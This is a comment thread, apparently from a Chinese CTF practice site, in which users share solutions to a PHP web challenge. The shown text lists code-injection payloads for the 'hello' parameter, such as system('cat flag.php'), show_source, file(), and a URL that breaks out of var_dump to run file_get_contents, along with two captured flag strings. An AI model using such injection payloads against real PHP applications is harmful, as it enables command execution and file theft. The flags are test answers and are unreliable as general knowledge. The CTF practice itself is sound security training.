system("tac flag.php")
?hello=file('flag.php')
hello=system("cat flag.php")
show_source('flag.php')
system("cat+flag.php")
我想的是用sql注入类似的方法,把var_dump注释掉,让其执行后面的代码 http://114.67.175.224:13863/?hello=$SERVER);$fileContent%20=%20file_get_contents(%27/flag%27);echo%20$fileContent;//
flag{6dd6075616f5943ab53cff237ff1a63b}
flag{b97285ef92aa650fa9223aafc7adc646};
http://114.67.175.224:12290//?hello=file('flag.php')
?hello=file('flag.php') file函数是把一个文件中的内容读入到一个数组中
...
评论
18993762527 19天前
举报
system("tac flag.php")
南城,北风 1月前
举报
?hello=file('flag.php')
wangyihao 1月前
举报
hello=system("cat flag.php")
18092952956 2月前
举报
show_source('flag.php')
BlueL1ght 2月前
举报
system("cat+flag.php")
zhuleixy 2月前
举报
我想的是用sql注入类似的方法,把var_dump注释掉,让其执行后面的代码 http://114.67.175.224:13863/?hello=$SERVER);$fileContent%20=%20file_get_contents(%27/flag%27);echo%20$fileContent;//
15738762315 4月前
举报
flag{6dd6075616f5943ab53cff237ff1a63b}
maoctf 4月前
举报
flag{b97285ef92aa650fa9223aafc7adc646};
哥哥 5月前
举报
http://114.67.175.224:12290//?hello=file('flag.php')
z03ctfer 5月前
举报
?hello=file('flag.php') file函数是把一个文件中的内容读入到一个数组中